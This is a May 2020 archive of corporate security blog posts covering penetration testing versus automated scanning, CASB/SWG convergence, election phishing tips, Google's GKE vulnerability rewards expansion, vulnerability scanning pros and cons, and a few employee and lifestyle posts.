Monthly Archives: May 2020

Why Manual Penetration Testing and Automation are Important Aspects of an AppSec Program

Authored by Jacques Lopez and Tom Estonツ?

As a result of the current COVID-19 pandemic, most companies are operating remotely. This ???new normal??? has led to an increased demand for digital transformations and cloud migrations. But Verizon???s 2020 Data Breach Investigations Report recently noted that cyberattackers are taking advantage of the digital transformations, finding new ways to attack web applications. As Tami Erwin, CEO of Verizon Business, recently stated, ???As remote working surges in the face of the global pandemic, end-to-end security from the cloud to employee laptop becomes paramount.???

So how can you digitally transform your business while maintaining application security (AppSec)? You need to incorporate Manual Penetration Testing (MPT) along with AppSec automation. Only leveraging Manual Penetration Testing (MPT) can be costly and time-consuming, but ??? if you only leverage automated scans ??? you could miss authorization issues and business logic flaws. Let???s explore MPT and AppSec automation in-depth, and weigh the pros and cons, to show why both are essential to properly protect your applications.

Manual Penetration Testing

MPT is conducted by a human, known as a ???pen tester.??? The pen tester leverages security and assessment tools to uncover vulnerabilities in applications along with the resulting impact. MPT is vital for the deep inspection of critical apps because it finds classes of vulnerabilities that automated assessments can???t, such as authorization issues and business logic flaws. It also helps validate the results of an overall AppSec program. That said, it cannot be the only testing type used for your applications. It simply doesn???t integrate well enough to meet developer???s needs, and it???s not cost-effective.

Pros:

  • Leverages human understanding of business logic, finding vulnerabilities that automated assessments can???t identify
  • Offers in-depth testing into the application
  • Uses multiple tools to test the application
  • Provides an excellent snapshot in time of the security of the application
  • Is the generally accepted compliance step for a security review

Cons:

  • Does not always integrate well into the development process; although, there are more ???crowdsourced??? and ???continuous??? penetration testing models arising to reduce response times
  • Can be a bottleneck in the process and slow development down while they wait for the results
  • Results can vary between tests and penetration testers ??? just part of human nature that testers will see different things and have different approaches
  • Occasionally leaves security gaps in between testing
  • Can be cost-prohibitive to test the full portfolio of applications

AppSec Automation

AppSec Automation is the programmatic incorporation of automated security scanning into the DevOps process and the security risk management practice. Security automation is required for scale, cost-effectiveness, and integration into the DevOps process.ツ?Organizations that solely rely on MPT have a minimal chance of reaching the programmatic outcomes around risk reduction that continuous scanning can provide.

Pros: ツ?

  • Can be integrated into the development process which is much easier for developers to use
  • Scales to encompass most, if not all, of the application portfolio
  • Implements a consistent and repeatable security policy
  • Benchmarks to show improvement over time
  • Scans on-demand at multiple stages of development and security review
  • Less expensive per scan

Cons:

  • Can only scan for what it knows.ツ? It does not currently replace understanding the business logic of an application and creativity of a professional pen tester
  • May not be considered independent attestation if done with an on-premises tool

Both are required for a fully effective program but address different needs.ツ? MPT is best suited for a point-in-time assessment on business-critical applications where business logic considerations come into play.ツ?Automation builds a scalable AppSec program that benchmarks and demonstrates a reduction of risk over time.ツ? It also aligns with the development process which is key in getting developers to adopt security practices.

If your organization is considering a digital transformation and looking to implement MPT or automated scans, we can help. Veracode and our channel partners can help you build out a program that meets your needs. Visit our product page to learn more.

The Power of Convergence

This blog was written by Rodman Ramezanian, Pre-Sales Security Engineer at McAfee

In cybersecurity, integration has become a near-obligatory requirement for organisations considering new products. They want to know new products will complement existing investments to collectively produce more effective and efficient solutions.

But as of late, the term convergence has emerged as another key capability and expectation of technology platforms.

I’d like to explore how these terms differ and how those differences will shape security outcomes in the future.

Definitions

Let’s start with a stone-cold definition. According to the Merriam-Webster Dictionary:

  • Integrate means “to end the segregation of and bring into equal membership in society or an organisation”
  • Converge means “to come together and unite in a common interest or focus”

Are we splitting hairs here? Are they much of a muchness?

These days, integration typically refers to the establishment of a common communication channel or route between disparate solutions to solve a particular challenge – usually to enable data sharing of some sort. Standard examples we hear sound like, “we’ve integrated this tool with that platform via API/Syslog/PowerShell” or various other methods.

Convergence approaches things differently by consolidating features and capabilities onto a common scalable architecture and platform. To take a common example from daily life (nowadays, anyway), converged networks such as Cisco WebEx, Zoom, and Microsoft Teams to name just a few, amalgamate voice, video, and data services within a unified infrastructure.

Convergence aims to deliver the following benefits:

  • Lower costs and complexity

* Consolidating vendors and technology stacks should reduce licensing and operational costs, as well as management overhead

  • Enabling new digital business scenarios

* Apps, services, APIs, and data shareable to partners and contractors with lower risk exposure.

  • Ease of use/transparency

* Avoiding app bloat, fewer agents per device, consistency of experience regardless of user location or device

  • Centralisation

* Cloud-based centralised management with distributed policy enforcement and decision making

While these benefits may not come as a surprise to some, many could argue that integration could very well yield the same outcomes and thus, the differences are negligible. Let’s take a moment to walk through a real-world example to show the contrast between the two.

Challenges and Benefits

It may be helpful to elaborate with examples to highlight just some challenges typically faced with integrations.

Let’s consider an organisation that wants to improve its security attentiveness and overall posture by blocking access to websites and Cloud services based on business risk, not just standard reputational checks. In this given scenario, let’s assume the organisation has mandated that its lines of business must ensure Cloud services being used must store their data encrypted when at rest.

In order to achieve this from a workflow perspective, they would need to integrate the business risk attributes for a given website (such as whether or not data at rest is encrypted) from a Cloud Access Security Broker (CASB) solution, along with the content filtering and blocking capabilities from a Secure Web Gateway (SWG) solution. Usually, this would be done via custom API integration; assuming that no further re-architecture work or implementation of data sharing platforms is needed.

No alt text provided for this image

Considering this, ask yourself what happens if/when:

  • The API is changed during an upgrade?
  • The SWG appliance requires a patch or version upgrade?
  • The personnel who wrote or implemented the integration leave the organisation?
  • Credentials and/or certificates used to authenticate between the solutions need to be refreshed?
  • The connection between the solutions breaks down, is the customer ultimately responsible for restitching the products together? Or are the respective vendors then called into action?

Now, let’s reflect on the benefits we mentioned earlier. Complexity goes out the window the moment we begin to mention bespoke integration via coding and credential/certificate management. Version control for the code, along with the dependence on version specific APIs, draw out more complexity as change management for each iteration of the configuration needs to be tested. In addition, we need to consider the additional complexity brought by the need to open up firewall ports between the various components involved to make this integration work.

Centralised management and enforcement don’t exist as the two solutions and their ontologies don’t align. That is, a risk attribute for a Cloud service in the CASB product cannot be natively stored in the SWG as its ontology lacks this concept. This means that they must resort to a common lower value ontology which is common across the two – in this case, the URL. The resultant integration means a dumbed-down list of URLs must be used. This list would be routinely and regularly pushed from the CASB to a list within the SWG. At that point, its accuracy and timeliness become highly dependent on the synchronisation and polling period between the two products.

With this, ease of use diminishes as attrition in personnel brings about lost institutional knowledge and know-how unless knowledge is transferred or sufficiently documented. Also, in the event of an incorrect block on a website, troubleshooting would become troublesome.

No alt text provided for this image

We could simplify this integration and remove some of the barriers mentioned above were we to use a Cloud-delivered SWG – however challenges such as different ontology, API management, credential management and integration testing remain unchanged.

So then, how does one go from integration to convergence? The answer is simple – acceptance of the need to change the approach and a willingness to get it done.

In order to adequately address the use case at hand, the technologies involved need to come together to ultimately become one. While this seems like something that could be blurred in a Cloud-delivered offering through converging parts of the UI with microservices from both products, doing so would technically fall into the integration bucket as ontologies and UI/UX remain different and would lack simplification. So, what would it take to converge CASB and SWG solutions?

  • Merging ontology – Bringing both CASB and SWG elements together. An example of this may be, using the same Cloud “Service Group” object in both solutions
  • Leveraging common capabilities – It doesn’t just stop with ontology. The solutions need to merge other components such as incident management, logging, dashboards, policy definitions, user authentication, etc. This convergence would not only improve the end user experience, but also reduce future technical debt in maintaining overlapping capabilities and components
  • Refactoring UI/UX – Rethinking and re-working the user experience to bring about the simplest flow to achieve the converged use cases
No alt text provided for this image

In the figure below, we have a policy example that creates a grouping of all high-risk Cloud services, current and future, that can be used as a restriction for web access. The result is that any high-risk Cloud service will be blocked by the Cloud-native SWG, preventing users from accessing these services to keep them safe from accidental data loss and/or malware. All this with no bespoke integration, no polling or pulling, no scripts, no firewall rules, no credential or certificate management and most importantly, no complexity!

No alt text provided for this image

Now, this is just but one example of convergence as part of McAfee’s Unified Cloud Edge (UCE) solution. Further convergence is necessary to refactor many of the data protection workflows traditionally kept separate from other enterprise security platforms.

According to an industry survey conducted by McAfee, only 31% of companies said their Cloud security tools could enforce the same DLP policies at their Devices, Network, and Cloud Services.

As part of McAfee’s Unified Cloud Edge solution, the convergence of Data Loss Prevention (DLP) policies and attributes with SWG and CASB technologies will ultimately lead to the unification of data classifications, rules, incidents, workflows, and so much more across Devices, Networks, and Cloud environments.

Final thoughts

Blended threats require a blended security response. Converging security practices and capabilities creates a whole that’s greater than the sum of its parts. Even something as simple as unifying an organisation’s security visibility – spanning from Device to Cloud – through a converged and centralised portal yields powerful gains in specific incidents and over the long run.

Converging security processes should align your security operations with your business goals and amplify your organisation’s performance of its most important functions. A converged security program protects your organisation’s key assets and helps get them back up and running faster when something does go wrong. Ultimately, converged security practices can be part of your organisation’s competitive advantage.

If you’d like to discuss any of the points covered here, or more specifically McAfee’s converged security solutions in further detail, please feel free to reach out to me.

* Special thanks to my manager Sahba Idelkhani for his guidance and input into this blog *

The post The Power of Convergence appeared first on McAfee Blogs.

Leaning into Change with the McAfee Family

With today’s current climate, many companies are building cultures and infrastructures to support working from home (WFH). Like most transitions, this brings equal parts expectation and surprise.

For some, working from home means having more quality time with family or finally being able to take that 10 a.m. yoga class. It means experimenting with homeschooling schedules and more puppy time. Learning how to use funny webcam filters and backgrounds has never seemed more important.

Read Our Stories

At McAfee, we are no exception to this evolution. We have virtual employees around the world, including team members who have recently transitioned to remote work. See how some of our McAfee family is adapting to this environment:

“It’s just my wife and me and our two cats, so we’ve been fortunate that our primary inconvenience has been trying to keep the kitties from pouncing on our warm laptops.” Dennis, Product Marketing

“Although walks are slightly different with trying to maintain the 6 ft distance with strangers, it’s nice to see more of the neighborhood going out for  walks with their family and pets. I’ve never seen so many people walking around before!” Sarah, Business Operations

“Thankfully, we set up our home office a few years ago, and it’s been very comfortable to work from for me. The hardest part is not having social interactions, but I’m trying to make conscious efforts to reach out to people.” Aki, Product Design

“I’m grateful for all the added family time that we have now! Also, the house has probably not been this clean in YEARS.” Tiffany, Product Marketing

“I was very used to going to the office so working from home has been a change. However, I get to see my family much more often than before.” Pablo, Product Management

“I was fortunate enough to work remotely before it was required, but my coworker here helps give structure to my days with morning, lunch, and evening walks, almost bookending my workday!” Jonathan, Product Marketing

“Transitioning to working from home full-time has taught me the need to establish a routine and stick to it. I make sure I’m exercising, setting work hours and taking breaks. The first couple of weeks without that routine in place was tough, but now I feel more balanced and not drained. Another good tip: Always keep healthy snacks and water at your work station!” Lily, Program Manager

“Working from home is turning out to be great! I have the perfect work station with a standing desk to stay productive. I love having my five-year-old daughter, Stella, visit me in my makeshift office between her online school sessions and seeing my wife and daughter more than ever before!” Martin, Product Management

“Transitioning to working remotely has been a bit rocky, but the 10-step commute and daily lunch with my wife makes it much less painful. My two dogs have been the real winners!” Alex, User Research

“I had minor shoulder surgery right before the quarantine and couldn’t carry a monitor from the office, so I made it work with an old TV on my kitchen counter! I can sit AND stand at my new desk, and the proximity to snacks and fresh coffee is a nice perk.” —Iram, Marketing Operations

“My three active kids were rarely in the house prior to this event. Now dinner together is a regular thing, and everyone is enjoying it. I’m thinking games and puzzles might be a way to avoid it devolving into a Lord of the Flies scenario.” —Tracy, Product Management

“The work/home balance is a constant effort of refinement. Though it has been somewhat rocky at times, I’ve found my stride and am now getting to spend more time with my family in the morning and at night.” Jon, Visual Design

“I’m so glad I took some time to set up a dedicated workspace – it made a huge difference. The cat’s still on my lap, and I’m still in the living room, but I’m off the couch and in a real chair, and have places to put my stuff, so I don’t have to hunt around every morning.” Paula, Executive Communications

 

Are you looking for a flexible career opportunity in a thriving culture? Search our openings.

The post Leaning into Change with the McAfee Family appeared first on McAfee Blogs.

Secure Development Without Sacrificing Innovation and Speed

If you know the term ???nightly build,??? chances are you???ve been a part of that process before. A nightly build - or code compiled overnight from previously checked code - is a foundational way to find flaws or issues that arise from changes made during long build processes. But while a staple in DevOps, nightly builds also present a problem: if new bugs are discovered the following morning after the build, everything slows down. Additionally, such activity only heightens the wall between development and security by compartmentalizing the tasks developers and security professionals must undertake every day (or night).

The history of the divide between security and development doesn???t fall solely on nightly builds, of course. It comes from a place of misconception, where developers fear that security leaders are ready to stall production at every turn, and security leaders lack the knowledge to fully understand the lingo, processes, or goals of developers. Historically, both teams have worked away in their own siloed departments with little to no direction from leadership on ways to come together.

Unifying security and development

By bridging the lines of communication, both teams can start to have serious conversations about producing more secure code without sacrificing the speed needed to meet tight deadlines. At the core of the issue is education. Both development and security teams need to find a common ground for working together and take it a step further to understand exactly how the other side of the aisle works ??? and how they can plug in their own processes to make that work more effective.

On the developer side of the aisle, that comes down to appreciating the value of security and sharpening the skills they need to write code with fewer flaws and bugs. On the security side, it means understanding developer timelines, tools, and processes, then working with leadership to figure out how to integrate security tools into their existing methods for time-saving automation and valuable coding feedback.

According to a recent report by Securosis, this should be a top-down effort involving members from all the necessary teams. ???With DevOps you need to close the loop on issues within infrastructure, security testing as well as code. And Dev and Ops offer different possible solutions to most vulnerabilities, so the people managing security need to include operations teams as well.???

Once members of these teams come together with open dialogue about current issues and business goals, they???re on the right path to begin discussing which processes and tools will improve the health of their application security without impacting deployment speed.

Know where to start when fixing flaws

Security debt is a real problem that adds up over time and should be addressed with a plan of action to bring it down and reduce risk. But not every vulnerability is mission-critical, whether it sits in a pile of security debt or it was discovered in a batch of new flaws during a recent scan.

According to the Securosis report, deciding which vulnerabilities to tackle first is a common issue for development teams. ???During our research many security pros told us that all vulnerabilities started looking like high priorities, and it was incredibly difficult to differentiate a vulnerability with impact on the organization from one which did not,??? the report says.

Prioritization can speed up the entire development process as little time is wasted going back and forth. While helping to set priorities for developers, security leaders have an opportunity to help developers understand which flaws need to be addressed immediately during development, and which possible threats tie back to unattended vulnerabilities so that developers have a better understanding of how to prioritize flaws in the future.

Automation through integration

Automation brings rapidity and, if used long enough, consistency. With modern software development speeding up and not slowing down, it???s more important than ever that developers have the right scanning tools to plug directly into their existing processes with seamless integration. And while automated feedback and security testing alone won???t catch every flaw, error, or vulnerability, it sets a precedent for incorporating security into the development process, and a baseline for healthy code as the team moves through development.

Complete application security plans incorporate scanning and testing into every stage of the development process, from the IDE to the Pipeline and even review, staging, and production. Veracode Static Analysis has this covered, with automated security feedback in the IDE and Pipeline that alerts (and trains) developers while they work. Veracode Static Analysis conducts a full policy scan before deployment too, showing the vulnerabilities that developers should focus on, and leaving an audit trail for review.

With a tool like Veracode Static Analysis integrated into existing systems and processes, security and development teams will gain clear insight into not only which flaws to prioritize, but also areas where developers need more training and education so that they can produce more secure code in the future. This automated (and peer) feedback helps set a standard for consistency, and improves speed overall ??? those nightly builds can then turn into builds with continuous integration that facilitates faster fix rates.

eLearning tools for continuous education

Continuous education is something that both security and development should embrace if they want to help close the information and communication gaps between the two teams. Security leaders for their part should brush up on developer lingo, tools, and languages ??? especially when a new language is introduced into the development process.

For developers, boosting skills through hands-on courses, virtual workshops, and instructor-led training increases the speed at which developers work and the security of their applications. By bringing continuous education into the mix so that secure code is front of mind, security and development teams will have an easier time shifting security left with each new project. Eventually, it???ll become a regular part of the process to learn from past mistakes, grow to become more innovative and adapt to new security threats.

Tools like Veracode Security Labs take training to the next level by providing developers with real-world examples of threats that they can exploit and patch for practice. This hands-on-keyboard training is unlike cookie-cutter courses, as it is interactive and focuses on real applications with real vulnerabilities.

Security Labs helps meet training and compliance needs, too, with customized education in the languages an organization???s developers use most. That tailored experience becomes invaluable when every hour of the day is dedicated to improving the security of your applications. Developers start learning right away and plug back in when they???re ready for more; it???s a small step that has a big impact.

For more information on speeding up the development process through integration, automation, and feedback, read our eBook on how you can secure your software development pipeline with Veracode Static Analysis.

2020 Voters: What You Need to Know About Election Security

Voters across the country are preparing to cast their ballot for the all-important 2020 U.S. presidential elections. Whether you’re a new voter eager for your voice to be heard or a parent looking to guide your family members on exercising their right to vote, consumers can be certain about one thing: election security should be top-of-mind for everyone as Election Day creeps closer. In addition to researching the presidential candidates and deciding who to support, consumers should also educate themselves on how to vote safely and securely.    

Heads Up, First-Time Voters

As a young or first-time voter, you are probably eager to have your voice finally heard. However, you should also be on high alert for digital disinformation campaigns. These scams seek to suppress or disrupt the voting process by setting up bogus websites with official-sounding domains and related email addresses. From there, hackers could use those bogus email addresses to send mass email blasts intended to feed unsuspecting voter email recipients false information on when, where, and how to vote.   


According to recent McAfee survey results, the majority of election administration websites for “tossup” states lacked the official U.S. government .GOV website validation and HTTPS website security measures, which prevent hackers from launching fake websites disguised as legitimate county government sites. It is critical that before Americans cast that incredibly important ballot, they confirm the site they are visiting is a .GOV website and that HTTPS security protection is in place.  

Help Protect Your Family’s Vote

Whether it’s who you’re voting for or what you think of party policy, it’s incredibly important that every voice is heard in 2020. As people across the country make their decision, you must discuss the implications of digital disinformation and illegitimate voting websites with your family. Failing to discuss these attacks with new or young voters could mean the difference between whether or not their voice is heard in the 2020 election. Consumers must take action to ensure they are staying informed on possible hacks like this and sharing it with their loved ones to ensure no voices are left unheard this year.  

Whether it’s your first or fifteenth time heading to the polls, we must all take action to ensure we’re staying informed on possible hacks, minimizing risk and not leaving this vote to chance. As you or your loved ones prepare to cast your ballots, consider these tips to help ensure that your vote is protected:   

Look out for suspicious emails

Carefully scrutinize all election-related emails. An attacker seeking to misinform consumers can use phishing techniques to accomplish their objective. Beware of election emails from non-.gov addresses such as .com, .net, .org, or .us, particularly any emails sent in the final days before Election Day. 

 Question conflicting instructions

Question any voting instructions that appear to conflict with other guidance you’ve received from traditional sources such as the U.S. Postal Service, the primary channel state and local governments use to send out voting information.  

Refer to your official State website

When in doubt, visit your state’s elections website to receive general election information on voter registration and contact information for your county’s election officials. Contact the local county officials to confirm any election instructions you receive via email, social media, or websites leading up to Election Day. Voters can find the official state election websites here 

Confirm local instructions locally

Call your county or city government officials directly to confirm any last-minute voting instruction changes to the regional or local Election Day procedures. 

Ask for .gov and https on websites

Ask your county officials to use .gov validation and https protection on any government websites involved in elections. The .gov in a website name validates that the U.S. government has certified that the website truly belongs to the government entity it claims. The https indicates that any information you with the government website cannot be stolen and that voters cannot be redirected to fake government sites.  

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook  

The post 2020 Voters: What You Need to Know About Election Security appeared first on McAfee Blogs.

How I Use McAfee’s Volunteer Time Off to Help Lost Paws Find Homes

by Christine, Sales Operations, Plano

Imagine sixteen paws, eight floppy ears and four wagging tails happily greeting you at the door—that’s my welcoming committee every day. Dogs have always held a special place in my heart, but it wasn’t until I added the third to my pack that I felt dogs were my passion.

I averaged 100 volunteer hours a year for an animal rescue, but with the Volunteer Time Off benefit at McAfee, I can add another 32 hours to that, which allows me even more time to support rehoming approximately 650 animals per year. 

Answering the Howl

Six years ago, my calling found me when I adopted my third from Lost Paws Rescue of Texas. During my conversations with the founder and volunteers, I learned Lost Paws operated with little to no funding and they supported animals on the side of their full-time jobs! There was no shelter or storefrontit’s a foster-only rescue, which means donations directly support the animals and programs.

Impressed and inspired, something just clicked. With my hobby marketer skills and passion for animals, I could help. 

Learning New Tricks 

My top talent is ideation, and since my household is nearly at capacity with canine companions, I come up with other ways to volunteer. It’s my creative outlet. I take pictures of the animals, work adoption events, add story updates to the website and learned how to help with SEO as well as make crate pads and bandanas for the animals. 

Helping animals find a loving home is rewarding but carving out time to make an impact is challenging. That’s why I’m so appreciative to work for a company that offers time off to volunteer. With four days off per year to volunteer, I know I’m supported in giving back to a cause that is important to me.   

Most recently, I’ve used McAfee’s Volunteer Time Off benefit to expand my skill set with grant writing classes. With stronger writing skills, I could better support funding requests for Lost Paws.  

Making an Impact with McAfee 

Giving back in these different ways is rewarding. I’ve helped grow Lost Paws Rescue’s participation in community giving initiatives. Through our SEO efforts when DFW rescues are

 Googled, Lost Paws Rescue of Texas appears on the front page (alongside some of the larger, global animal rescues!). I’m also proud to share that grant writing classes were helpful as we were awarded $26K for a couple of my successful submissions just last fall. 

McAfee’s Volunteer Time Off (VTO) benefit is simply awesome. We are so lucky to have volunteer days as employees. I’m constantly trying to figure out a new way to serve this cause. It’s been a labor of love—for me, for the animals and for this organization and it’s empowering to know McAfee supports me along the way. 

Here, I can bring all my passions, interests and talents through the door. 

Interested in working for a company that supports giving back? Search our openings. 

The post How I Use McAfee’s Volunteer Time Off to Help Lost Paws Find Homes appeared first on McAfee Blogs.

Expanding our work with the open source security community



At Google, we’ve always believed in the benefits and importance of using open source technologies to innovate. We enjoy being a part of the community and we want to give back in new ways. As part of this effort, we are excited to announce an expansion of our Google Vulnerability Rewards Program (VRP) to cover all the critical open-source dependencies of Google Kubernetes Engine (GKE). We have designed this expansion with the goal of incentivizing the security community to work even more closely with open source projects, supporting the maintainers whose work we all rely on.

The CNCF, in partnership with Google, recently announced a bug bounty program for Kubernetes that pays up to $10,000 for vulnerabilities discovered within the project. And today, in addition to that, we are expanding the scope of the Google VRP program to also include privilege escalation bugs in a hardened GKE lab cluster we've set up for this purpose. This will cover exploitable vulnerabilities in all dependencies that can lead to a node compromise, such as privilege escalation bugs in the Linux kernel, as well as in the underlying hardware or other components of our infrastructure that could allow for privilege escalation inside a GKE cluster.

How it works
We have set up a lab environment on GKE based on an open-source Kubernetes-based Capture-the-Flag (CTF) project called kCTF. Participants will be required to:
  • Break out of a containerized environment running on a Kubernetes pod and,
  • Read one of two secret flags: One flag is on the same pod, and the other one is in another Kubernetes pod in a different namespace.
Flags will be changed often, and participants need to submit the secret flag as proof of successful exploitation. The lab environment does not store any data (such as the commands or files used to exploit it), so participants need the flags to demonstrate they were able to compromise it.

The rewards will work in the following way:
  • Bugs that affect the lab GKE environment that can lead to stealing both flags will be rewarded up to 10,000 USD, but we will review each report on a case-by-case basis. Any vulnerabilities are in scope, regardless of where they are: Linux, Kubernetes, kCTF, Google, or any other dependency. Instructions on how to submit the flags and exploits are available here.
  • Bugs that are 100% in Google code, qualify for an additional Google VRP reward.
  • Bugs that are 100% in Kubernetes code, qualify for an additional CNCF Kubernetes reward.
Any vulnerabilities found outside of GKE (like Kubernetes or the Linux kernel) should be reported to the corresponding upstream project security teams. To make this program expansion as efficient as possible for the maintainers, we will only reward vulnerabilities shown to be exploitable by stealing a flag. If your exploit relies on something in upstream Kubernetes, the Linux Kernel, or any other dependency, you need to report it there first, get it resolved, and then report it to Google. See instructions here.

The GKE lab environment is built on top of a CTF infrastructure that we just open-sourced on GitHub. The infrastructure is new, and we are looking forward to receiving feedback from the community before it can be actively used in CTF competitions. By including the CTF infrastructure in the scope of the Google VRP, we want to incentivise the community to help us secure not just the CTF competitions that will use it, but also GKE and the broader Kubernetes ecosystems.

In March 2020, we announced the winner for the first Google Cloud Platform (GCP) VRP Prize and since then we have seen increased interest and research happening on Google Cloud. With this new initiative, we hope to bring even more awareness to Google Cloud by experienced security researchers, so we can all work together to secure our shared open-source foundations.

The pros and cons of vulnerability scanning

Scanning your networks and software for security vulnerabilities is essential for keeping your organisation secure, but it’s not a perfect solution.

It will help you identify weaknesses in your system – with new ones being discovered all the time or introduced as a result of system changes – but it only works when combined with other practices and when you have a solid understanding of the information security landscape.

Let’s take a deeper look into the advantages and disadvantages of vulnerability scanning.

Advantages

Identify vulnerabilities before cyber criminals do

Many cyber attacks are automated, and involve criminals searching for and exploiting known vulnerabilities.

In other words, they’re not creating a vulnerability or finding an obscure weakness through their expert hacking skills. They’re simply looking for vulnerabilities in the same way as anyone with the right scanning software could.

So when organisations use the same tools, they are able to discover weaknesses and fix them before anyone has a chance to exploit them.

Define the level of risk on your systems

Conducting regular vulnerability scans will help you determine the overall effectiveness of your security measures.

If you’re inundated with vulnerabilities, that’s a sign that your systems or software are severely flawed and need to be rethought.

Save time and money

Automated scans are easy to repeat and will save you money in the long term.

That’s because vulnerability scanning mitigates the risks of a data breach, which will come with a range of costs, including remediation, the loss of customers as a result of reputational damage and fines.

Likewise, if you have cyber insurance, you will need to conduct regular vulnerability scans to prove that you were addressing your cyber security responsibilities and to receive your pay-out.

Meet data protection requirements

Vulnerability scanning is not explicitly required by the GDPR (General Data Protection Regulation), but the Regulation does require organisations that process personal data to ensure that they have implemented appropriate technical and organisational security measures – which includes identifying vulnerabilities.

The international standard for information security, ISO 27001, also requires organisations to take similar steps, and the PCI DSS (Payment Card Industry Data Security Standard) includes vulnerability scanning in its list of requirements.

Disadvantages

You won’t find every vulnerability

Vulnerability scans aren’t perfect. Like antivirus software, they rely on a database of known weaknesses and are only as good as the latest update.

Conducting scans using outdated or inferior tools therefore means you are liable to miss vulnerabilities and get a false sense of security.

Even with the latest technology, there will almost certainly be weaknesses that the scanner won’t pick up. This might be because it’s newly discovered or because the vulnerability is too complex to be exploited – and thus detected – by an automated tool.

False positives

It’s not always easy to work out what the results of a vulnerability scan mean. For example, the tool might mistakenly flag something that looks suspicious as a vulnerability when it isn’t.

As such, without someone with the expertise to interpret the results, it will take a lot longer to determine the true nature of your security posture. Likewise, if you’re unable to filter out false positives, the tool will continue to generate inaccurate results.

Make the most of vulnerability scanning

Although vulnerability scanning is never a perfect solution, it’s an essential process – and there are ways of maximising the benefits while minimising the drawbacks.

For example, our Vulnerability Scan service contains the benefits of an automated tool and the expertise of security professional.

The tool will scan for thousands of weaknesses each month, and you’ll receive a detailed vulnerability assessment that gives you a breakdown of the weak spots that you must address.

Identify vulnerabilities and misconfigurations in your websites with our vulnerability scanning service

The post The pros and cons of vulnerability scanning appeared first on IT Governance UK Blog.

Entertainment #FromHome: What to do When You’re Bored at Home

 Entertainment #FromHome: What to do when you’re bored at home

 

If your queue of movies and shows are looking a little on the “I’ve already watched that one twice already” side, this one’s for you. I’ve put together a raft of fresh shows, movies, and performances based upon my online travels and on suggestions from a few friends. And oh yes, everything on here is for free—from reputable sources and sites—free movies, free shows, free plays, free audio books, and more. Let’s dig in!

Catch a movie at a free global film festival

An entire host of major film festivals have banded together to create a virtual film festival—the We Are One Global Film Festival, which kicks off on May 29th and runs through June 7th. Now this looks really special. It brings together some 20 festivals, including Cannes, Sundance, Toronto International, Berlin International, Tribeca, Venice, and more, so you can only imagine what types of cinema you’ll find. It’s all free and looks to include festival fare ranging from films and shorts to documentaries, music, and comedies, all of which you can watch on YouTube. As I’m writing this, the list of films have yet to be published, but you can bet on seeing some films you simply won’t see anywhere else right now.

London’s National Theatre at home

For some time, London’s National Theatre has recorded numerous performances through its National Theatre Live program, which it has broadcast to hundreds of venues worldwide. Now, with its temporary closure, the National Theatre is premiering a new performance every Thursday. Each one is free and available for one week, with performances from actors such as James Corden, Benedict Cumberbatch, Tom Hiddleston, and Gillian Anderson in anything from American classics like A Streetcar Named Desire to Shakespeare, Greek theatre, and adaptations of novels like Frankenstein and Treasure Island.

Free movies, eBooks, and audio books

I referenced Open Culture a few weeks ago in one of my earlier articles on personal development from home, and they’re back again this week. This time, it’s Open Culture’s free audio book library with 1,000 titles to choose from. You’ll find a mix of fiction and non-fiction with reading of Twain, Hemmingway, Vonnegut, Austen, Asimov, Conan Doyle, Dostoyevsky, and … well, clearly, I could go on. You get the idea, though. An additional list of theirs compiles 800 free eBooks for you reading pleasure with a similar blend of fiction, non-fiction, and poetry too.

And yes, Open Culture has free movies as well. It’s quite the curated list with more than 1,100 free films that range from indies to westerns and Hitchcock to John Wayne and old martial arts flicks and film noir. That’s in addition to all of the other content they gather from across the internet and make available to us, with other sections dedicated to free language lessons, free business courses, and more. Put it this way: if you’re ever on the hunt for something fresh to read, watch, or do, Open Culture is a great site.

Free eBooks and audio books from Libby

There’s one free resource for movies, music, and books that’s been around for some time—your public library. More recent is an excellent app for enjoying eBooks and audio books from your library on your phone or tablet, the Libby app. With this app you can access the thousands of books available at your library and enjoy them with a built-in reader and a built-in audio book player. The search functionality is quite nice too. It’s curated much like your movie queue, with sections dedicated to what’s new, what’s popular, and by topic, which is quite nice if you don’t have a particular book in mind. You can simply start exploring.

In all, the experience feels like you’re digitally exploring the shelves. Per their website, some 90% of public libraries in North America work with Overdrive, the service that powers the app, as well as libraries in some 78 countries worldwide. (You can search and see if your library works with the app right here.) All you need is your library card. Don’t have one? No problem. Many libraries allow you to get a card right inside the app. Likewise, you can visit your local library’s website for details on how to get one as well.

Play at Home

If anything, I’m continually inspired and a little blown away by the ingenuity people are showing now—particularly as we all look to keep connected and share experiences together while many venues are closed, at least for the time being. Case in point, Play at Home, where instead of watching a show, you can be the show. Play at Home offers up an entire series of short plays commissioned just for people to perform at home. And if you’re feeling particularly bold, they even have a few musicals too. They’re minutes in length, and they have plenty of family-friendly options too in their kid-friendly section which has “plays written to be performed by or for young people and to be enjoyed by humans of all ages.”

So, whether you perform in your living room or fire up a conference call to get some family and friends in on this, is an absolute departure from the normal movie night. Nice to know too is that this all started as a small group of five theatres looking to support artists during theatre closures, which has since expanded to 16 theatres and counting, including The Old Globe and the JFK Center for the Performing Arts.

The Shows Must Go On!

What a great name for a series of free musicals. Much like what the National Theatre has done, The Shows Must Go On! streams a new musical for free each Friday. Each one is a full-length performance and is available starting at 7pm BST (2pm ET, 11am PT, and 5am AET Saturday). Runs are limited, though. Just for 48 hours, which is just in time for the weekend. So far, there have been plenty of hits from Andrew Lloyd Webber, like Cats, Jesus Christ Superstar, and The Phantom of the Opera. And yes, it’s okay for you to belt one out and sing along while you watch. In fact, I encourage it.

Free nightly opera at the Met

Yet more performances are coming to your screen thanks to the New York Metropolitan Opera. This time, the performances refresh nightly as part of their Live in HD opera series. These will run for the duration of the Opera’s temporary closure, and you can plan your attendance ahead of time by checking out their weekly guide that provides capsule previews of each show. Puccini, Mozart, Gounod, Wagner, Verdi all have operas that make the grand stage, and while you may not find yourself singing along with these, the spectacle of a Met opera is something to behold. Also posted online are Playbills from the original performance dates, so you can indulge in the synopses, program notes, and more.

Play it (and stream it) safe

To be absolutely blunt about it, anytime you go searching for “free” anything, you’re bound to come across sketchy sites and links that prey on well-meaning people like you—particularly now. With folks keeping close to home, hackers and crooks have fine-tuned their scams accordingly. In fact, we have an entire research study that we’ve just conducted and are ready to share in a few weeks that shows how they’re taking advantage of streamers right now—and what you can do to play it safe when you’re simply looking to pass some time with a good show online.

